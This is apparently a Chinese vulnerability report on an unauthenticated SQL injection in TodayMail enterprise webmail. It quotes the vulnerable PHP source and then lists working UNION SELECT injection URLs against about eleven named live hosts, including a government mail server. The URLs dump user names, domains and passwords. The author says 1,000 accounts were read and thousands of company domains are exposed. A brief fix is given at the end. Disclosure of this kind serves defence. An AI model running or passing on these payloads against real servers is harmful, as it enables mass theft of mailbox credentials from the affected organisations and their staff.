TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤

漏洞作者: xfkxfk

详细说明:

TodayMail,时代企业邮,简介如下:

http://www.now.cn/email/overview.net

搜索关键字:时代企业邮

案例很多,就不截图了

文件searchAddr.inc.php

<?

header('Content-Type:text/xml;charset=UTF-8');

include_once "../config/dbremote.inc.php";

include_once "../../core/emailcore.class.inc.php";



$value=trim($_REQUEST['value']);

$tm_id=trim($_REQUEST['ftm_id']);

$EmailCore = new EmailCore($tm_id);

$addrList=$EmailCore->searchAddrAllByKeyword($value);

$str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";

$str.="<num>".count($addrList)."</num>";

for($i=0;$i<count($addrList);$i++){

        $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";

        $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";

}

$str.="</property></properties>";

echo $str;

?>
 

第一:

可以看到这里没有包含登录验证的文件,所以可以无需登录即可直接访问

然后$value=trim($_REQUEST['value']);

接着$addrList=$EmailCore->searchAddrAllByKeyword($value);

跟进函数searchAddrAllByKeyword,文件emailcore.class.inc.php

function searchAddrAllByKeyword($value){

                //global $db_remote;

                $addrArray=array();

                $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $addrArray[]=$array;

                }

                $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";

//              echo $sql;

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $array['email']=$array['name']."@".$array['email'];

                        $addrArray[]=$array;

                }

                $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $addrArray[]=$array;

                }

                return $addrArray;

        }
 

清楚的看到变量$value直接进入select sql语句了,没有进行任何过滤处理,导致SQL注入漏洞产生。。。

这里是没有登录的直接拿到数据

可惜的是没有拿到服务器权限,而且通过域名看到,这里存在大量的企业。

以官网为例吧:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

通过这里的tm_domain域名字段,可以看到存在4000个域名

07170209cb3f3682407b6122279a14d7fe295188[1]

去重也存在3000多个域名,意味着有3000多个企业咯

漏洞证明:

以官网为例吧:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

这里读取了1000个用户的用户名,域名,密码

07170225503b5007ecff198306ba969ade520f96[1]

再随便给几个例子:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 
http://mail.wfq.gov.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://streamline.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.inkbank.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.zhangjiang.net/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx601.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx605.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx606.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx621.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

 

而且数据库很多,邮件内容等都会泄漏的。

用户量很大,应该是高危漏洞,很多企业的邮箱系统基本上都会沦陷。

修复方案:

包含登录验证文件,过滤

发表评论